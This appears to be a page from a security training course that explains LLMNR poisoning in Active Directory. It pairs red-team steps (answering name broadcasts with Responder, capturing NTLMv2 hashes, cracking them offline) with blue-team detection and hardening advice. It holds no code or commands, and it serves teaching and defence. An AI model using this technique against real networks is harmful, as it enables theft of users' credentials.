^.^;

LLMNR Poisoning

Listen for LLMNR broadcasts.
Respond with malicious answers.
Capture NTLMv2 hashes when victims authenticate.
No credentials needed—just network access.

IntermediatePhase 2: Active DirectoryInteractive Dual Perspective

LLMNR Poisoning

Active Directory Name Resolution Attack

Requires: Network access • Difficulty: Low • Impact: High

💻 Desktop Experience Available

View this module on desktop for an interactive LLMNR Poisoning simulation with hash capture visualization.

LLMNR Poisoning (Link-Local Multicast Name Resolution) is an Active Directory attack that exploits Windows' fallback name resolution protocol. When DNS fails, Windows broadcasts LLMNR queries on the local network. Attackers respond with malicious answers, causing victims to authenticate to attacker-controlled shares and leaking NTLMv2 password hashes.

How LLMNR Works (Normal):

  1. User types \\fileserver in Windows Explorer
  2. DNS query fails (fileserver not in DNS)
  3. Windows falls back to LLMNR: broadcasts "Who is fileserver?" on UDP 5355
  4. Legitimate fileserver responds with its IP address
  5. User connects and authenticates

Attack Exploit:

LLMNR has no authentication. Any host on the network can respond to LLMNR queries. Attackers listen for LLMNR broadcasts, respond claiming to be the requested host, and capture NTLMv2 authentication hashes when victims attempt to connect.

Why It's Effective: LLMNR is enabled by default on all Windows systems (Vista+). Users frequently mistype share names or access resources not in DNS. Every failed DNS lookup triggers an LLMNR broadcast—creating countless attack opportunities.

Legal & Ethical Warning

LLMNR Poisoning techniques should only be used in authorized penetration testing, red team engagements, or controlled lab environments. Unauthorized access to computer systems is illegal under CFAA and equivalent laws worldwide. Always obtain written permission before testing.

LLMNR Poisoning Attack Simulator

Broadcast Listening & NTLMv2 Hash Capture

Attack Progress0%
Workstation-01
IP: 192.168.1.100
Laptop-Sales
IP: 192.168.1.101
Responder (Attacker)
IP: 192.168.1.150
DNS Server (Offline)
IP: 192.168.1.10
⚠ OFFLINE

Attack Phases

Ready
Listening for Broadcasts
LLMNR Query Detected
Poisoned Response
Hash Capture
Attack Complete

Captured NTLMv2 Hashes

Waiting for broadcasts...

🔴 RED TEAM: Attack Techniques

  • Responder Tool:
    Listen for LLMNR/NBT-NS broadcasts on network.
    No credentials required—just network access.
  • Poisoned Response:
    Reply faster than legitimate DNS server.
    Claim to be the requested host.
    Victim connects to attacker machine.
  • NTLMv2 Capture:
    Victim automatically authenticates.
    Capture hashed credentials (NTLMv2).
    Crack offline with Hashcat/John.
  • Passive Attack:
    Completely passive—attacker only responds.
    No active scanning.
    Hard to detect without monitoring.

🔵 BLUE TEAM: Detection & Defense

  • Disable LLMNR/NBT-NS:
    Group Policy: Turn off multicast name resolution.
    Registry: Disable NBT-NS on all adapters.
    Use DNS exclusively.
  • Network Monitoring:
    Alert on multiple LLMNR responses from same IP.
    Detect abnormal response patterns.
    Use IDS signatures for Responder traffic.
  • Network Segmentation:
    Isolate critical systems on separate VLANs.
    Prevent broadcast traffic between segments.
    Reduce attack surface significantly.
  • Strong Password Policy:
    Even if hashes captured, strong passwords resist cracking.
    Enforce 15+ character passwords.
    Use passphrases instead of passwords.
Terms of ServiceLicense AgreementPrivacy Policy
Copyright © 2025 JMFG. All rights reserved.